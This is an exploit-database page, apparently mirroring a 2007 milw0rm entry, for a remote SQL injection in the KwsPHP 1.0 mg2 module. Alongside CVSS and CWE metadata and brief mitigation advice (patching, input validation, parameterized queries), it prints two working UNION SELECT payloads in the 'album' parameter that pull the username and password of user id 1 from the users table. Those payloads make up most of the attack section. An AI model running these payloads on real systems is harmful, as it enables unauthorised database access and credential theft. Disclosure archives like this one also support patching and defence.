header-logo
Suggest Exploit
vendor:
KwsPHP
by:
xoron
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: KwsPHP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:kwsphp:kwsphp:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack in the KwsPHP 1.0 mg2 module. By manipulating the 'album' parameter in the 'index.php' file, an attacker can retrieve sensitive information from the 'users' table, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or update to a secure version of KwsPHP. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

--------------------

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

Found : xoron

--------------------

Exploit:

Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*

Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*

--------------------

Bundan sonra hep tek, hep yek xoron..!

--------------------

# milw0rm.com [2007-10-13]

Navigation

Suggest Exploit

Services By CQR